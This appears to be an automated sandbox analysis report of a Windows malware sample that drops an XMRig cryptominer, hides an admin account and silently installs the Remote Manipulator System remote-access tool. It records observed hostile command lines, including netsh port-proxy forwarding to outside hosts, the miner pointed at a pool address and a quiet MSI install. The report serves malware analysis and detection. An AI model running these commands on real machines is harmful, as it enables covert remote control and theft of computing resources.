Analysis
- max time kernel: 134s
- max time network: 143s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 18-05-2022 12:32
Static task: static1
Behavioral task: behavioral1
Sample: 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
Resource: win10v2004-20220414-en
General
- Target: 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
- Size: 397KB
- MD5: 45626e0ba033517e92404779ed548fb1
- SHA1: 72722ee51dc3cb8be87f35203b0bd41a380c9a52
- SHA256: 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4
- SHA512: 9227d419b99cc75921d0a8fc12851954905e49d3ad83d399813ba5d18e5c3171e62c076cd4d8dd9a58e0881bc77b90db0ace80dd932a8048eb037154039f3f15
Malware Config
Signatures
-
XMRig Miner Payload 3 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe | xmrig
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe | xmrig
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe | xmrig
-
Downloads MZ/PE file
-
Executes dropped EXE 4 IoCs
Processes:
pid | process
2372 | $77_oracle.exe
4648 | $77_oracle.exe
3120 | RMS.exe
2228 | installer.exe
-
Sets file execution options in registry 2 TTPs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | RMS.exe
Key value queried | \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation | installer.exe
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Modifies WinLogon 2 TTPs 3 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\adm = "0" | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
-
Modifies powershell logging option 1 TTPs
-
Drops file in Windows directory 2 IoCs
Processes:
description | ioc | process
File created | C:\Windows\SoftwareDistribution\config.xml | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
File opened for modification | C:\Windows\SoftwareDistribution\config.xml | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Gathers network information 2 TTPs 6 IoCs
Uses commandline utility to view network configuration.
Processes:
pid | process
3500 | NETSTAT.EXE
3136 | NETSTAT.EXE
3424 | NETSTAT.EXE
4064 | NETSTAT.EXE
3748 | NETSTAT.EXE
3812 | NETSTAT.EXE
-
Suspicious behavior: EnumeratesProcesses 23 IoCs
Processes:
pid | process
3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
2228 | installer.exe
2228 | installer.exe
2228 | installer.exe
2228 | installer.exe
2228 | installer.exe
2228 | installer.exe
2228 | installer.exe
2228 | installer.exe
2228 | installer.exe
2228 | installer.exe
-
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid | process
664 |
664 |
-
Suspicious use of AdjustPrivilegeToken 44 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
Token: SeSecurityPrivilege | 228 | msiexec.exe
Token: SeDebugPrivilege | 3748 | NETSTAT.EXE
Token: SeDebugPrivilege | 3812 | NETSTAT.EXE
Token: SeDebugPrivilege | 3500 | NETSTAT.EXE
Token: SeLockMemoryPrivilege | 2372 | $77_oracle.exe
Token: SeLockMemoryPrivilege | 2372 | $77_oracle.exe
Token: SeDebugPrivilege | 3136 | NETSTAT.EXE
Token: SeDebugPrivilege | 3424 | NETSTAT.EXE
Token: SeDebugPrivilege | 4064 | NETSTAT.EXE
Token: SeLockMemoryPrivilege | 4648 | $77_oracle.exe
Token: SeLockMemoryPrivilege | 4648 | $77_oracle.exe
Token: SeShutdownPrivilege | 4576 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 4576 | msiexec.exe
Token: SeSecurityPrivilege | 1032 | msiexec.exe
Token: SeCreateTokenPrivilege | 4576 | msiexec.exe
Token: SeAssignPrimaryTokenPrivilege | 4576 | msiexec.exe
Token: SeLockMemoryPrivilege | 4576 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 4576 | msiexec.exe
Token: SeMachineAccountPrivilege | 4576 | msiexec.exe
Token: SeTcbPrivilege | 4576 | msiexec.exe
Token: SeSecurityPrivilege | 4576 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 4576 | msiexec.exe
Token: SeLoadDriverPrivilege | 4576 | msiexec.exe
Token: SeSystemProfilePrivilege | 4576 | msiexec.exe
Token: SeSystemtimePrivilege | 4576 | msiexec.exe
Token: SeProfSingleProcessPrivilege | 4576 | msiexec.exe
Token: SeIncBasePriorityPrivilege | 4576 | msiexec.exe
Token: SeCreatePagefilePrivilege | 4576 | msiexec.exe
Token: SeCreatePermanentPrivilege | 4576 | msiexec.exe
Token: SeBackupPrivilege | 4576 | msiexec.exe
Token: SeRestorePrivilege | 4576 | msiexec.exe
Token: SeShutdownPrivilege | 4576 | msiexec.exe
Token: SeDebugPrivilege | 4576 | msiexec.exe
Token: SeAuditPrivilege | 4576 | msiexec.exe
Token: SeSystemEnvironmentPrivilege | 4576 | msiexec.exe
Token: SeChangeNotifyPrivilege | 4576 | msiexec.exe
Token: SeRemoteShutdownPrivilege | 4576 | msiexec.exe
Token: SeUndockPrivilege | 4576 | msiexec.exe
Token: SeSyncAgentPrivilege | 4576 | msiexec.exe
Token: SeEnableDelegationPrivilege | 4576 | msiexec.exe
Token: SeManageVolumePrivilege | 4576 | msiexec.exe
Token: SeImpersonatePrivilege | 4576 | msiexec.exe
Token: SeCreateGlobalPrivilege | 4576 | msiexec.exe
-
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
pid | process
2372 | $77_oracle.exe
4648 | $77_oracle.exe
-
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
pid | process
2228 | installer.exe
-
Suspicious use of WriteProcessMemory 49 IoCs
Processes:
description | pid | process | target process
PID 3384 wrote to memory of 2296 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | csc.exe
PID 3384 wrote to memory of 2296 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | csc.exe
PID 2296 wrote to memory of 4560 | 2296 | csc.exe | cvtres.exe
PID 2296 wrote to memory of 4560 | 2296 | csc.exe | cvtres.exe
PID 3384 wrote to memory of 1492 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | chcp.com
PID 3384 wrote to memory of 1492 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | chcp.com
PID 3384 wrote to memory of 4800 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | netsh.exe
PID 3384 wrote to memory of 4800 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | netsh.exe
PID 3384 wrote to memory of 3748 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | NETSTAT.EXE
PID 3384 wrote to memory of 3748 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | NETSTAT.EXE
PID 3384 wrote to memory of 3812 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | NETSTAT.EXE
PID 3384 wrote to memory of 3812 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | NETSTAT.EXE
PID 3384 wrote to memory of 3500 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | NETSTAT.EXE
PID 3384 wrote to memory of 3500 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | NETSTAT.EXE
PID 3384 wrote to memory of 4912 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | netsh.exe
PID 3384 wrote to memory of 4912 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | netsh.exe
PID 3384 wrote to memory of 328 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | netsh.exe
PID 3384 wrote to memory of 328 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | netsh.exe
PID 3384 wrote to memory of 1864 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | netsh.exe
PID 3384 wrote to memory of 1864 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | netsh.exe
PID 3384 wrote to memory of 3504 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | netsh.exe
PID 3384 wrote to memory of 3504 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | netsh.exe
PID 3384 wrote to memory of 2664 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | netsh.exe
PID 3384 wrote to memory of 2664 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | netsh.exe
PID 3384 wrote to memory of 2372 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | $77_oracle.exe
PID 3384 wrote to memory of 2372 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | $77_oracle.exe
PID 3384 wrote to memory of 2856 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | netsh.exe
PID 3384 wrote to memory of 2856 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | netsh.exe
PID 3384 wrote to memory of 3136 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | NETSTAT.EXE
PID 3384 wrote to memory of 3136 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | NETSTAT.EXE
PID 3384 wrote to memory of 3424 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | NETSTAT.EXE
PID 3384 wrote to memory of 3424 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | NETSTAT.EXE
PID 3384 wrote to memory of 4064 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | NETSTAT.EXE
PID 3384 wrote to memory of 4064 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | NETSTAT.EXE
PID 3384 wrote to memory of 756 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | netsh.exe
PID 3384 wrote to memory of 756 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | netsh.exe
PID 3384 wrote to memory of 5092 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | netsh.exe
PID 3384 wrote to memory of 5092 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | netsh.exe
PID 3384 wrote to memory of 2288 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | netsh.exe
PID 3384 wrote to memory of 2288 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | netsh.exe
PID 3384 wrote to memory of 3120 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | RMS.exe
PID 3384 wrote to memory of 3120 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | RMS.exe
PID 3384 wrote to memory of 3120 | 3384 | 0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe | RMS.exe
PID 3120 wrote to memory of 2228 | 3120 | RMS.exe | installer.exe
PID 3120 wrote to memory of 2228 | 3120 | RMS.exe | installer.exe
PID 3120 wrote to memory of 2228 | 3120 | RMS.exe | installer.exe
PID 2228 wrote to memory of 4576 | 2228 | installer.exe | msiexec.exe
PID 2228 wrote to memory of 4576 | 2228 | installer.exe | msiexec.exe
PID 2228 wrote to memory of 4576 | 2228 | installer.exe | msiexec.exe
Processes
(process tree; indentation shows parent/child depth, each entry gives the image path, then the command line, then the signatures matched by that process)
-
C:\Users\Admin\AppData\Local\Temp\0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\0a7e84e07d7dffea2925e5a508c2a419ffd2a44f110e0645972e4d077d8822b4.exe"
  - Checks computer location settings
  - Modifies WinLogon
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
-
    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d9w9p_jz.cmdline"
      - Suspicious use of WriteProcessMemory
-
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
          Command line: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB4FE.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB4FD.tmp"
-
    C:\Windows\system32\chcp.com
      Command line: "C:\Windows\system32\chcp.com" 437
-
    C:\Windows\system32\netsh.exe
      Command line: "C:\Windows\system32\netsh.exe" interface portproxy show all
-
    C:\Windows\system32\NETSTAT.EXE
      Command line: "C:\Windows\system32\NETSTAT.EXE" -na
      - Gathers network information
      - Suspicious use of AdjustPrivilegeToken
-
    C:\Windows\system32\NETSTAT.EXE
      Command line: "C:\Windows\system32\NETSTAT.EXE" -na
      - Gathers network information
      - Suspicious use of AdjustPrivilegeToken
-
    C:\Windows\system32\NETSTAT.EXE
      Command line: "C:\Windows\system32\NETSTAT.EXE" -na
      - Gathers network information
      - Suspicious use of AdjustPrivilegeToken
-
    C:\Windows\system32\netsh.exe
      Command line: "C:\Windows\system32\netsh.exe" interface portproxy reset
-
    C:\Windows\system32\netsh.exe
      Command line: "C:\Windows\system32\netsh.exe" interface portproxy show all
-
    C:\Windows\system32\netsh.exe
      Command line: "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=msupdate.info
-
    C:\Windows\system32\netsh.exe
      Command line: "C:\Windows\system32\netsh.exe" interface portproxy show all
-
    C:\Windows\system32\netsh.exe
      Command line: "C:\Windows\system32\netsh.exe" interface portproxy show all
-
    C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe" -o 5.133.65.54:80 --http-port 888 -t 1
      - Executes dropped EXE
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
-
    C:\Windows\system32\netsh.exe
      Command line: "C:\Windows\system32\netsh.exe" interface portproxy show all
-
    C:\Windows\system32\NETSTAT.EXE
      Command line: "C:\Windows\system32\NETSTAT.EXE" -na
      - Gathers network information
      - Suspicious use of AdjustPrivilegeToken
-
    C:\Windows\system32\NETSTAT.EXE
      Command line: "C:\Windows\system32\NETSTAT.EXE" -na
      - Gathers network information
      - Suspicious use of AdjustPrivilegeToken
-
    C:\Windows\system32\NETSTAT.EXE
      Command line: "C:\Windows\system32\NETSTAT.EXE" -na
      - Gathers network information
      - Suspicious use of AdjustPrivilegeToken
-
    C:\Windows\system32\netsh.exe
      Command line: "C:\Windows\system32\netsh.exe" interface portproxy show all
-
    C:\Windows\system32\netsh.exe
      Command line: "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=703 connectport=80 connectaddress=5.133.65.54
-
    C:\Windows\system32\netsh.exe
      Command line: "C:\Windows\system32\netsh.exe" interface portproxy show all
-
    C:\Users\Admin\AppData\Local\Temp\RMS.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\RMS.exe"
      - Executes dropped EXE
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
-
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe" /rsetup
          - Executes dropped EXE
          - Checks computer location settings
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of SetWindowsHookEx
          - Suspicious use of WriteProcessMemory
-
            C:\Windows\SysWOW64\msiexec.exe
              Command line: "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi" /qn
              - Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\msiexec.exe
  Command line: C:\Windows\system32\msiexec.exe /V
  - Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
-
C:\Windows\system32\msiexec.exe
  Command line: C:\Windows\system32\msiexec.exe /V
  - Suspicious use of AdjustPrivilegeToken
-
    C:\Windows\syswow64\MsiExec.exe
      Command line: C:\Windows\syswow64\MsiExec.exe -Embedding BD88F9647C19DCABFC93C4C4F47249C0
-
    C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
      Command line: "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /silentinstall
-
    C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
      Command line: "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /firewall
-
    C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
      Command line: "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /start
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
Filesize: 6.0MB
MD5: c9704931d887685d96ce92d637d84045
SHA1: 0875a71e9118ded121d92f3f46a3af1ec8380f8b
SHA256: 0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826
SHA512: 3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260
-
C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
Filesize: 6.0MB
MD5: c9704931d887685d96ce92d637d84045
SHA1: 0875a71e9118ded121d92f3f46a3af1ec8380f8b
SHA256: 0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826
SHA512: 3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260
-
C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
Filesize: 6.0MB
MD5: c9704931d887685d96ce92d637d84045
SHA1: 0875a71e9118ded121d92f3f46a3af1ec8380f8b
SHA256: 0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826
SHA512: 3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260
-
C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
Filesize: 1.9MB
MD5: 9feb2c3ed2e5390079e4eea98f11a9a8
SHA1: b5cd56f0e474bf45075f5ce80b0f6ecfa4b378f8
SHA256: 9baf9cebeab9046da0644494e7cf1f498d2dd0e345ae45c279697e5cd818f80b
SHA512: 97216dc921cad3fbeb2d6ebd4b5cdb1654420158e3618bb08d4802e79648cd237bedc3d87146eb911e9c9a3ef757e6f85a9fdcb211560326b59581d2c13b3f1b
-
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe
Filesize: 3.7MB
MD5: 3b89f9f1e9932eee5a031b0266894f5f
SHA1: c77b26bf58884507389cd1c5699174eec3459df2
SHA256: 757fa687a9b4d461ffda78d93e4d812003307a9b9747dce7fb469625429cc551
SHA512: 62eca2262b9a292c283844fd71a76bad6f1d59bd8c93541747f3cbd7b0532c81343da23781b81b9bdeb055aa6f2fd72dff0a520331331585601b3f86855a266b
-
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe
Filesize: 3.7MB
MD5: 3b89f9f1e9932eee5a031b0266894f5f
SHA1: c77b26bf58884507389cd1c5699174eec3459df2
SHA256: 757fa687a9b4d461ffda78d93e4d812003307a9b9747dce7fb469625429cc551
SHA512: 62eca2262b9a292c283844fd71a76bad6f1d59bd8c93541747f3cbd7b0532c81343da23781b81b9bdeb055aa6f2fd72dff0a520331331585601b3f86855a266b
-
C:\Users\Admin\AppData\Local\Temp\$77_oracle.exe
Filesize: 3.7MB
MD5: 3b89f9f1e9932eee5a031b0266894f5f
SHA1: c77b26bf58884507389cd1c5699174eec3459df2
SHA256: 757fa687a9b4d461ffda78d93e4d812003307a9b9747dce7fb469625429cc551
SHA512: 62eca2262b9a292c283844fd71a76bad6f1d59bd8c93541747f3cbd7b0532c81343da23781b81b9bdeb055aa6f2fd72dff0a520331331585601b3f86855a266b
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
Filesize: 6.0MB
MD5: c9704931d887685d96ce92d637d84045
SHA1: 0875a71e9118ded121d92f3f46a3af1ec8380f8b
SHA256: 0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826
SHA512: 3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
Filesize: 6.0MB
MD5: c9704931d887685d96ce92d637d84045
SHA1: 0875a71e9118ded121d92f3f46a3af1ec8380f8b
SHA256: 0448c45cb43585409002e01ef53442cb9f6ad58f211f5deb3ad2ca8b8d535826
SHA512: 3b739394f69ec9f26ef607a0d481f1ad3d107462220c2281cbc300f16886ab3d857bee9af59b8857c7e7ae5b04e6a849eaa5e304d6935957a0a15e462375c260
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi
Filesize: 7.4MB
MD5: 73e578a44265558d3ace212869d43cbb
SHA1: d2c15578def8996ed0ae4a44754055b774b095a7
SHA256: 8a6945ead42d78d963d6f2e126eebb89c0e82b02c389d4badcaa837ff49bf7f4
SHA512: fe661e19899a6f749a180e5b312fcebb2963acc92720d1c6cabba22b0ffd250f1930c9dac62f789cd4b99aff86ef0f3944ae52a583e2c1be57c9fca391be9bf4
-
C:\Users\Admin\AppData\Local\Temp\RESB4FE.tmp
Filesize: 1KB
MD5: 709dfc3a899f8127427c5fb788215ab4
SHA1: db7e31d32f16f9e0978d14df17d9160c08065853
SHA256: e6fdacaa5792c0d7146b811df67eb084e774760cd8672007f75be3642060418a
SHA512: aaad5b90af7e0a89b686850641811cc333e436baa86a43a4d5d3528737db6e422a46827f2de62966f66f61c4973fc923fd7a1622d1e8e4d7c5706082211988db
-
C:\Users\Admin\AppData\Local\Temp\RMS.exe
Filesize: 8.3MB
MD5: 73f351beae5c881fafe36f42cde9a47c
SHA1: dc1425cfd5569bd59f5d56432df875b59da9300b
SHA256: a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824
SHA512: f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66
-
C:\Users\Admin\AppData\Local\Temp\RMS.exe
Filesize: 8.3MB
MD5: 73f351beae5c881fafe36f42cde9a47c
SHA1: dc1425cfd5569bd59f5d56432df875b59da9300b
SHA256: a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824
SHA512: f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66
-
C:\Users\Admin\AppData\Local\Temp\config.json
Filesize: 3KB
MD5: 74fb175e205d74c162df04f8236ec94b
SHA1: 57ccfe00ef11556ffa576c74eeecf3730659ae89
SHA256: 1fb2afa760aeaee7a0201e34a6ff5071d5755312d14132e8956e840eaae78dc9
SHA512: 8b7ab1c082a965b921f3a56a75e2190365e5b7f1519b4d8da9c78cded313ed151ed8967e9b0599077c284ea4127e0471ecdc936dd96ca624d5a9f5707ce54830
-
C:\Users\Admin\AppData\Local\Temp\d9w9p_jz.dll
Filesize: 3KB
MD5: b198909a9684d9698aeaa29d9a143616
SHA1: 5f9d4bf700b95316880bc52c7a1cf8805f0eeaec
SHA256: ccebfa9d569486728c6b145dd88ad0e7ce02d5e7c8f648b9adf6cdae312541d6
SHA512: 07b9efeed115a65f9079ada86c7781eb48f3316ea5c7f3fdfee50cd08f0b75f2bbd0f02bd32fd1056a0850f9fe94fe9622656326ad43b4f12797606860ecf138
-
C:\Users\Admin\AppData\Local\Temp\d9w9p_jz.pdb
Filesize: 11KB
MD5: 8c738b1fbeccbda3a10b2566c5f7fb38
SHA1: 294180465e1c8b9e58689240c378c34cd8c381b3
SHA256: 0c6de1492339ccab4d58760e70a427dc0f97dac4714fac05603351898b72bfcb
SHA512: f9ac5e3ffd41e66f6a9494264ff39bd765438b92ae3d5d22a58e12f099d1762649562f41aeff2559751ce8407a73e32a963c5c1862be5533d58404a7e8bea743
-
C:\Windows\Installer\MSIB1D6.tmp
Filesize: 125KB
MD5: b0bcc622f1fff0eec99e487fa1a4ddd9
SHA1: 49aa392454bd5869fa23794196aedc38e8eea6f5
SHA256: b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081
SHA512: 1572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7
-
C:\Windows\Installer\MSIB1D6.tmp
Filesize: 125KB
MD5: b0bcc622f1fff0eec99e487fa1a4ddd9
SHA1: 49aa392454bd5869fa23794196aedc38e8eea6f5
SHA256: b32687eaaad888410718875dcbff9f6a552e29c4d76af33e06e59859e1054081
SHA512: 1572c1d07df2e9262d05a915d69ec4ebeb92eab50b89ce27dd290fb5a8e1de2c97d9320a3bb006834c98b3f6afcd7d2c29f039d9ca9afaa09c714406dedbc3c7
-
